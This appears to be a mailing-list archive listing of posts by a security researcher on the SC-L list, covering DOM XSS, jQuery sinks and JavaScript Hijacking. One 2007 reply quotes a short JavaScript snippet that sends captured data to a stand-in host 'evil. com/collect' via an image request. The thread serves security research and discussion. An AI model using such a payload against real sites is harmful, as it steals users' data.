[SC-L] jQuery is a Sink

2011-07-28 Thread Stefano Di Paola
Guys, maybe the client-side security people may be interested: http://blog.mindedsecurity.com/2011/07/jquery-is-sink.html Cheers, Stefano -- ...oOOo...oOOo Stefano Di Paola Software Security Engineer Owasp Italy R&D Director Web: www.wisec.it Twitter: http://twitter.com/WisecWisec

[SC-L] DOMinator - The DOMXss Analyzer Tool - is finally public

2011-05-18 Thread Stefano Di Paola
...oOOo Stefano Di Paola Software Security Engineer Owasp Italy R&D Director Web: www.wisec.it Twitter: http://twitter.com/WisecWisec

Re: [SC-L] JavaScript Hijacking

2007-04-03 Thread Stefano Di Paola
captureObject(x){ (new Image()).src='http:// evil. com/ collect?email='+x; } </script> <script src='http:// vuln /json.js'></script> -- But this is just another way to accomplish your attack. BTW very nice paper! Regards, Stefano Thanks, Brian -- ...oOOo...oOOo Stefano Di Paola Software Security

Re: [SC-L] JavaScript Hijacking

2007-04-02 Thread Stefano Di Paola
Brian, I don't know if you read it, but Giorgio Fedon and I presented a paper named Subverting Ajax at the 23rd CCC Congress (4th section, XSS Prototype Hijacking): http://events.ccc.de/congress/2006/Fahrplan/attachments/1158-Subverting_Ajax.pdf It described a technique called Prototype Hijacking,